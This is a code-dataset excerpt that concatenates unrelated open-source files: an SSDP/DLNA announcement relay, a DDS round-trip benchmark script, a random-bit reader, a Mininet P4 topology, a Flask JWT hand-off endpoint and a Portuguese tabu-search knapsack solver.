+ 'USN: uuid:' + UUID + '::upnp:rootdevice' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: uuid:' + UUID + CRLF \
+ 'USN: uuid:' + UUID + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
else:
print "Skipping notification"
def respond(addr, port):
if (URL != '' and UUID != '' and not LISTEN):
# Note: responses should have ST:, notifies should have NT:
# We include both
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: upnp:rootdevice' + CRLF \
+ 'USN: uuid:' + UUID + '::upnp:rootdevice' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: uuid:' + UUID + CRLF \
+ 'USN: uuid:' + UUID + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ContentDirectory:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:ConnectionManager:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'HTTP/1.1 200 OK' + CRLF \
+ 'ST: urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
else:
print "Skipping response"
def server():
if not LISTEN:
msg = ('M-SEARCH * HTTP/1.1' + CRLF \
+ 'Host: %s:%d' + CRLF \
+ 'Man: "ssdp:discover"' + CRLF \
+ 'ST: upnp:rootdevice' + CRLF \
+ 'MX: 3' + CRLF \
+ 'User-Agent:ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ CRLF) % (SERVER, DLNA_PORT)
print "Sending to server: \n" + msg
osock.sendto(msg, (SERVER, DLNA_PORT))
def parse_msg(msg):
global URL, UUID, last_update, next_notification
if (re.match('^HTTP/1.1\s*200\s*OK', msg, re.IGNORECASE)):
# Response to our M-SEARCH
match = re.search(r'^LOCATION:\s*(.*)\r$', msg, re.IGNORECASE | re.MULTILINE)
if match:
URL = match.group(1)
match = re.search(r'^USN:\s*uuid:([^:]+):', msg, re.IGNORECASE | re.MULTILINE)
if match:
UUID = match.group(1)
print 'URL=%s, UUID=%s.' % (URL, UUID)
last_update = time.time()
# Bring the notifcation forward
next_notification = time.time() + 1
def is_search(msg):
return re.match('^M-SEARCH', msg, re.IGNORECASE)
# Get info from server
last_update = 0
server()
next_notification = time.time() + INTERVAL
# Note: the port is not set up until at least one send has happened
(notused, oport) = osock.getsockname()
isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
isock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
isock.bind(('', oport))
while True:
(readyin, notused, notused) = select.select([isock, imsock], [], [], max(next_notification - time.time(),0))
if (isock in readyin):
(msg, (addr, port)) = isock.recvfrom(4096)
print "Received unicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
else:
parse_msg(msg)
if (imsock in readyin):
(msg, (addr, port)) = imsock.recvfrom(4096)
if (port == oport):
print "Ignored multicast from ourselves (%s:%d)" % (addr, port)
else:
print "Received multicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
if (time.time() >= next_notification):
next_notification = time.time() + INTERVAL
# Has the server info been updated recently?
if (time.time() - last_update <= INTERVAL):
# Yes, just do the notification
notify(DLNA_GRP, DLNA_PORT)
else:
# Get new info from the server
server()
| gpl-2.0 | 3,653,407,125,376,547,000 | 36.891892 | 208 | 0.623573 | false | 2.642167 | false | false | false |
osrf/opensplice | examples/dcps/PerformanceScripts/Roundtrip.py | 2 | 9418 | import utils, os, sys, csv, subprocess, time, optparse, pdb
def pingpong(o):
texec = []
ping = 'ping'
pong = 'pong'
if sys.platform == 'win32':
ping = 'ping.exe'
pong = 'pong.exe'
apiselect=0
if o.capi:
#C
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + pong)
texec[apiselect].append('C')
apiselect+=1
if o.cppapi:
#SACPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + pong)
texec[apiselect].append('SACPP')
apiselect+=1
if o.isoapi:
#ISOCPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + pong)
texec[apiselect].append('ISOCPP')
apiselect+=1
''' Create or append to total averages file '''
tafcsv = utils.getCSV(o.averagesfile)
#Create nested dictionary
results = utils.tree()
for i in texec:
resultsApi = results[i[2]]
#1KB
Bsize = 1000
try:
if o.pongonly:
pong = subprocess.Popen([i[1]],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
utils.setPriority(pong.pid, o.pongnice, o.pongaffinity)
if o.pongonly and not o.pingonly:
#Run for 10 minutes and exit program
time.sleep(600)
sys.exit(0)
time.sleep(1)
''' Set the CSV output file (af) '''
csvfile = i[0] + ".csv"
cw = utils.getCSV(csvfile)
cw.writerow([str(time.strftime("%x %H:%M:%S"))])
try:
while(Bsize <= (o.maxpayload * 1000)):
resultsBsize = resultsApi[int(Bsize)]
print "launching " + i[0] + "with args:" + str(Bsize) + " " + str(o.samples) + " " + str(o.seconds)
cw.writerow([str(Bsize/1000)+"KB"])
cw.writerow(['Seconds'] + ['RT Count'] + ['RT median'] + ['RT min'] +
['W Count'] + ['W median'] + ['W min'] +
['R Count'] + ['R mean'] + ['R min']);
try:
if o.pingonly:
ping = subprocess.Popen( [i[0], str(Bsize), str(o.samples), str(o.seconds) ],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
utils.setPriority(ping.pid, o.pingnice, o.pingaffinity)
except OSError:
print "Cannot find ping executable: " + str([i[0]])
#Wait for ping to terminate
ping.wait()
for line in ping.stderr:
print 'err: ' + line
for line in ping.stdout:
utils.parseRT(line,resultsBsize)
for key in sorted(resultsBsize):
k = resultsBsize[key]
cw.writerow([key] +
[k['RoundTrip']['Count']] + [k['RoundTrip']['Median']] + [k['RoundTrip']['Min']] +
[k['Read']['Count']] + [k['Read']['Median']] + [k['Read']['Min']] +
[k['Write']['Count']] + [k['Write']['Median']] + [k['Write']['Min']])
Bsize = Bsize*2
except OSError:
print "Cannot find ping executable: " + [i[0]]
finally:
if o.pongonly:
#Quit pong
pingq = subprocess.Popen( [i[0], 'quit' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pingq.wait()
for line in zip(pingq.stdout, pingq.stderr):
print line
pong.terminate()
except OSError:
print "Cannot find pong executable: " + str([i[1]])
tafcsv.writerow([str(time.strftime("%x %H:%M:%S"))])
tafcsv.writerow(['Payload KB'] + ['RoundTrip C'] + ['RoundTrip SACPP'] + ['RoundTip ISOCPP']
+ ['Read C'] + ['Read SACPP'] + ['Read ISOCPP']
+ ['Write C'] + ['Write SACPP'] + ['Write ISOCPP'])
Bsize = 1000
while Bsize <= (o.maxpayload * 1000):
KB = Bsize/1000
#pdb.set_trace()
tafcsv.writerow([KB] + utils.is_empty(results['C'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Write']['Median']))
Bsize = Bsize*2
def main():
parser = optparse.OptionParser()
parser.add_option("-C", "--capi", dest="capi",
help="Run C API Roundtrip",
action="store_true",
default=False)
parser.add_option("-S", "--sacppapi", dest="cppapi",
help="Run SACPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-I", "--isocppapi", dest="isoapi",
help="Run ISOCPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-o", "--output", dest="averagesfile",
help=("Optional path and filename for a overall average payload and API size by"
"default this is stored in the current working directory"),
default="averages.csv")
parser.add_option("", "--pingonly", dest="pingonly",
help="Only create the ping daemon",
action="store_true",
default=False)
parser.add_option("", "--pongonly", dest="pongonly",
help="Only create the pong daemon",
action="store_true",
default=False)
pingopt = optparse.OptionGroup(parser, "Ping options",
"Change arguments for ping, run time in seconds, number of samples and maxpayload")
pingopt.add_option("", "--seconds", type="int", dest="seconds",
help="The number of seconds ping should execute for, the default is 10",
default=10)
pingopt.add_option("", "--samples", type="int", dest="samples",
help="The number of samples ping should send, the default is infinite",
default=0)
pingopt.add_option("", "--maxpayload", type="int", dest="maxpayload",
help="The max payload in kB, the default is 64",
default=64)
parser.add_option_group(pingopt)
cpuopt = optparse.OptionGroup(parser, "CPU and priority options",
"Allow the setting of NICE and CPU affinity")
cpuopt.add_option("", "--pingaffinity", type="int", dest="pingaffinity",
help="Set the CPU affinity for the ping process, the default is cpu 1",
default=1)
cpuopt.add_option("", "--pongaffinity", type="int", dest="pongaffinity",
help="Set the CPU affinity for the pong process, the default is cpu 0",
default=0)
cpuopt.add_option("", "--pingnice", type="int", dest="pingnice",
help="Set the nice value for the ping process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
cpuopt.add_option("", "--pongnice", type="int", dest="pongnice",
help="Set the nice value for the pong process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
parser.add_option_group(cpuopt)
(options, args) = parser.parse_args()
if(not options.capi and not options.cppapi and not options.isoapi):
#Nothing was set, run them all
options.capi = True
options.cppapi = True
options.isoapi = True
if not options.pingonly and not options.pongonly:
#Ping and pong (default)
options.pingonly = True
options.pongonly = True
pingpong(options)
if __name__ == "__main__":
main()
| apache-2.0 | -2,146,004,641,214,619,400 | 41.423423 | 185 | 0.502548 | false | 4.077056 | false | false | false |
alephu5/Soundbyte | IO/datalistener.py | 1 | 2367 | #! ../environment/bin/python3.3
import argparse
import tempfile
import os
from itertools import tee
from binascii import hexlify
def main():
parser = argparse.ArgumentParser(description = 'Reads binary data from a file')
parser.add_argument('-f, --file',
type = str,
default = '/dev/dsp',
help = 'Specifies file to read.',
dest = 'datasource')
parser.add_argument('-b, --bytesize',
type = int,
default = None,
help = 'Specifies number of bytes to read.',
dest = 'bytesize')
parser.add_argument('-d, --debias',
default = False,
const = True,
action = 'store_const',
help = 'Uses Von Neumann algorithm to balance numbers of 1s and 0s',
dest = 'debias')
parser.add_argument('-t, --temp',
default = '/tmp',
help = 'Give a prefix destination for storing temporary files',
dest = 'temp')
opts = parser.parse_args()
BitSource = DataStream(opts.datasource)
print(BitSource.getBinary(opts.bytesize, opts.debias, opts.temp))
def VNdebias(binary, temp):
debfile = tempfile.TemporaryFile(mode='a+', prefix = temp)
while True:
bits = binary.read(2)
try:
if bits[0] != bits[1]:
debfile.write(bits[1])
except(IndexError):
break
debfile.seek(0)
return debfile.read()
class DataStream:
def __init__(self, datasource):
self.datasource = datasource
def getBytes(self, bytesize):
with open(self.datasource,'rb') as bitSource:
return bitSource.read(bytesize)
def getInts(self, bytesize):
sourcebytes = self.getBytes(bytesize)
return sourcebytes
def getBinary(self, bytesize, debias, temp):
binfile = tempfile.TemporaryFile(mode='w+', prefix=temp)
for bit in self.getInts(bytesize):
binfile.write(format(bit,'08b'))
binfile.seek(0)
if debias == False:
return binfile.read()
else:
return VNdebias(binfile, temp)
if __name__ == "__main__":
main()
| gpl-3.0 | 4,968,535,609,732,957,000 | 33.808824 | 92 | 0.531474 | false | 4.264865 | false | false | false |
pierce-m/p4factory | mininet/swl_l2.py | 4 | 2283 | #!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
# Topology with two switches and two hosts (static macs, no loops, no STP)
#
# 172.16.10.0/24
# h1 ------------------- sw1 ------------------ sw2------- -------------h2
# .1 .2
##############################################################################
from mininet.net import Mininet, VERSION
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from distutils.version import StrictVersion
from p4_mininet import P4DockerSwitch
def main():
net = Mininet( controller = None )
# add hosts
h1 = net.addHost( 'h1', ip = '172.16.10.1/24' )
h2 = net.addHost( 'h2', ip = '172.16.10.2/24' )
# add switch 1
sw1 = net.addSwitch( 'sw1', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw1/l2',
pcap_dump = True )
# add switch 2
sw2 = net.addSwitch( 'sw2', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw2/l2',
pcap_dump = True )
# add links
if StrictVersion(VERSION) <= StrictVersion('2.2.0') :
net.addLink( sw1, h1, port1 = 1 )
net.addLink( sw1, sw2, port1 = 2, port2 = 2 )
net.addLink( sw2, h2, port1 = 1 )
else:
net.addLink( sw1, h1, port1 = 1, fast=False )
net.addLink( sw1, sw2, port1 = 2, port2 = 2, fast=False )
net.addLink( sw2, h2, port1 = 1, fast=False )
net.start()
CLI( net )
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
main()
| apache-2.0 | 7,596,828,744,844,814,000 | 33.590909 | 78 | 0.555848 | false | 3.539535 | false | false | false |
rohitdatta/pepper | pepper/innovation/views.py | 1 | 2072 | import validators
import jwt
import datetime
import urllib
from flask import request, jsonify, redirect, url_for, flash
from flask_login import current_user, login_required
from pepper import settings
from pepper.utils import get_default_dashboard_for_role
# sends an access token to the callback provided by the url
@login_required
def auth():
app_id = request.args.get('app_id')
callback = request.args.get('callback')
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
elif callback is None or not validators.url(callback):
return jsonify({'error': 'Invalid callback provided'}), 422
elif current_user.status == 'NEW':
flash('You must finish registering before starting the puzzle challenge', 'warning')
return redirect(url_for(get_default_dashboard_for_role()))
else:
access_token = {'t': jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=120),
'id': current_user.id, 'fname': current_user.fname, 'lname': current_user.lname}, settings.TOKEN_SEED, algorithm='HS256')}
return redirect(callback + "?" + urllib.urlencode(access_token))
# returns the current user's full name and database id
def get_user_info():
app_id = request.args.get('app_id')
access_token = request.args.get('t') #token
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
try:
decoded = jwt.decode(access_token, settings.TOKEN_SEED, algorithms=['HS256'])
return jsonify({'fname': decoded['fname'], 'lname': decoded['lname'], 'id': decoded['id']})
except jwt.ExpiredSignatureError:
return jsonify({'error': 'Token expired'}), 422
except jwt.InvalidTokenError:
return jsonify({'error': 'Token validation failed'}), 422
except jwt.DecodeError:
return jsonify({'error': 'Token cannot be decoded'}), 422
except jwt.InvalidSignatureError:
return jsonify({'error': 'Token has invalid signature'}), 422
| agpl-3.0 | -757,792,038,237,813,400 | 47.186047 | 134 | 0.686776 | false | 3.894737 | false | false | false |
marcoscastro/mochila_inteiro-busca_tabu | mochila_tabu.py | 1 | 8440 | # -*- coding:utf-8 -*-
# Autor: Marcos Castro
# Busca Tabu - Problema da Mochila Inteiro
# Configuração da Mochila
# Objeto (j) 1 2 3 4 5
# Peso (wj) 4 5 7 9 6
# Benefício (pj) 2 2 3 4 4
# Objetivo: Maximizar o benefício de cada elemento
# Função objetivo: f(s) = SOMATORIO[j=1 até n](pj)(sj) - SOMATORIO[j=1 até n](pj)(sj) * max{0, SOMATORIO[j=1 até n](wj)(sj) - b}
# Função objetivo resumida: f(s) = SOMATORIO[j=1 até n](pj)(sj) * [1 - max{0, SOMATORIO[j=1 até n](wj)(sj) - b}]
# Função de vizinhança: alterar apenas um dos bits (como os vizinhos vão ser gerados)
# função para obter o peso de determinada solução
# essa função calcula o somatório do peso
# passa uma solução e a mochila
def obter_peso(solucao, mochila):
peso = 0
for i in range(0, len(solucao)):
peso += solucao[i] * mochila[i][0]
return peso
# função que calcula o valor da função objetivo
# passa uma solução, a mochila e a capacidade máxima da mochila
def obter_avaliacao(solucao, mochila, capacidade_maxima):
somatorio_peso = 0
somatorio_beneficio = 0
for i in range(0, len(solucao)):
somatorio_peso += solucao[i] * mochila[i][0] # mochila[i][0] acessa o peso
somatorio_beneficio += solucao[i] * mochila[i][1] # mochila[i][1] acessa o benefício
avaliacao = somatorio_beneficio * (1 - max(0, somatorio_peso - capacidade_maxima))
return avaliacao
# função para gerar os vizinhos, a vizinhança é gerada trocando o bit
# melhor_solucao - melhor solução corrente
# max_vizinhos - quantidade máxima de vizinhos
def gerar_vizinhos(melhor_solucao, max_vizinhos):
vizinhos = []
pos = 0
for i in range(0, max_vizinhos):
vizinho = []
for j in range(0, len(melhor_solucao)):
if j == pos:
if melhor_solucao[j] == 0:
vizinho.append(1)
else:
vizinho.append(0)
else:
vizinho.append(melhor_solucao[j])
vizinhos.append(vizinho)
pos += 1
return vizinhos
# função para obter o valor de avaliação de cada vizinho
# vizinhos - lista de todos os vizinhos
# mochila - a mochila
# capacidade_maxima - capacidade máxima da mochila
# max_vizinhos - quantidade máxima de vizinhos
def obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos):
vizinhos_avaliacao = []
for i in range(0, max_vizinhos):
vizinhos_avaliacao.append(obter_avaliacao(vizinhos[i], mochila, capacidade_maxima))
return vizinhos_avaliacao
# função para obter o bit modificado
# melhor_solucao - melhor solução corrente
# melhor_vizinho - melhor vizinho
def obter_bit_modificado(melhor_solucao, melhor_vizinho):
for i in range(0, len(melhor_solucao)):
if melhor_solucao[i] != melhor_vizinho[i]:
return i
# função para obter o vizinho com a máxima avaliação
# vizinhos_avaliacao - valor de avaliação de todos os vizinhos
# lista_tabu - lista tabu para proibir determinada modificação de bit
# melhor_solucao - melhor solução corrente
# vizinhos - lista com todos os vizinhos
def obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos):
maxima_avaliacao = max(vizinhos_avaliacao)
pos = 0
bit_proibido = -1
# verifica se a lista tabu não possui elementos
if len(lista_tabu) != 0:
# se possuir, é porque tem bit proibido, então pega esse bit
bit_proibido = lista_tabu[0]
# for para obter a posição do melhor vizinho
for i in range(0, len(vizinhos_avaliacao)):
if vizinhos_avaliacao[i] == maxima_avaliacao:
pos = i
break
# verifico se o vizinho é resultado de movimento proibido
if bit_proibido != -1:
# se for, então obtém a posição do bit que foi modificado para gerar esse vizinho
bit_pos = obter_bit_modificado(melhor_solucao, vizinhos[pos])
# verifica se é um bit que está na lista_tabu (compara com bit_proibido)
if bit_pos == bit_proibido:
# se cair nesse if, então procura o segundo melhor vizinho
melhor_pos = 0
for i in range(1, len(vizinhos_avaliacao)):
if i != bit_pos:
if vizinhos_avaliacao[i] > vizinhos_avaliacao[melhor_pos]:
melhor_pos = i
return melhor_pos # retorna a posição do segundo melhor vizinho
return pos # retorna a posição do melhor vizinho
# configuração da mochila com uma lista de listas
# o primeiro é o peso e o segundo é o benefício
mochila = [[4,2], [5,2], [7,3], [9,4], [6,4]]
iteracao = melhor_iteracao = 0
melhor_solucao = [] # irá guardar a melhor solução
lista_tabu = [] # lista tabu inicialmente vazia
capacidade_maxima = 23 # capacidade máxima da mochila
bt_max = 1 # quantidade máxima de iterações sem melhora no valor da melhor solução
max_vizinhos = 5 # quantidade máxima de vizinhos
# PASSO 0
# gera uma solução inicial aleatória
import random # módulo para gerar números randômicos
# o for abaixo gera 5 vezes os números: 0 ou 1
for i in range(0, 5):
bit = random.randrange(2) # gera números de 0 (inclusive) a 1 (inclusive)
melhor_solucao.append(bit) # adiciona o bit na lista
# mostra a solução inicial e o seu valor de avaliação
print('Solução inicial: {0}, Avaliação: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
# obtém o peso corrente da mochila
peso_corrente = obter_peso(melhor_solucao, mochila)
# obtém a avaliação da melhor_solucao
melhor_avaliacao = obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)
# gera os vizinhos (vizinhança)
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)
# calcula a avaliação de todos os vizinhos
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)
# obtém a posição do melhor vizinho
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# verifica se o melhor vizinho tem avaliação melhor do que a melhor avaliação até o momento
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# obtém o bit que foi modificado do melhor vizinho
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu.append(bit_modificado) # guarda o movimento proibido
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # temos uma solução melhor, faz uma cópia
melhor_iteracao += 1 # incrementa a iteração onde foi achada a melhor solução até o momento
iteracao += 1 # incrementa iteração
# Aqui terminou o PASSO 0, agora iremos entrar em loop (executar os outros passos)
while True:
# a condição de parada é se a diferença da iteração e melhor_iteracao for maior que bt_max
# iteracao é a iteração global (sempre é incrementada)
# melhor_iteracao é a iteração onde se achou a melhor solução (nem sempre é incrementada)
# bt_max é o máximo de iterações sem melhora no valor da melhor solução
if (iteracao - melhor_iteracao) > bt_max:
break
# abaixo temos linhas de código quase idêntico ao PASSO 0
# gerando novos vizinhos, faz uma cópia dos novos vizinhos
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)[:]
# obtém o valor de avaliação de todos os vizinhos (faz uma cópia)
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)[:]
# obtém a posição do melhor vizinho
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# verifica se o melhor vizinho tem avaliação melhor do que a melhor avaliação corrente
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# obtém o bit que foi modificado para gerar o melhor vizinho
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu[0] = bit_modificado # guarda o movimento proibido (Essa linha NÃO existia no Passo 0)
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # temos uma solução melhor, faz uma cópia da lista
melhor_avaliacao = vizinhos_avaliacao[pos_melhor_vizinho] # atualiza a melhor avaliação
melhor_iteracao += 1 # incrementa a iteração onde foi achada a melhor solução (nem sempre é incrementada)
iteracao += 1 # incremento da iteração (sempre é incrementada)
# mostra a solução final e sua avaliação
print('Solução final: {0}, Avaliação: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
print('Melhor iteração: {0}'.format(melhor_iteracao)) # mostra a iteração onde foi achada a melhor solução
print('Iteração: {0}'.format(iteracao)) # mostra a iteração global
| gpl-2.0 | 4,742,286,044,789,534,000 | 45.264045 | 129 | 0.743048 | false | 2.18609 | false | false | false |
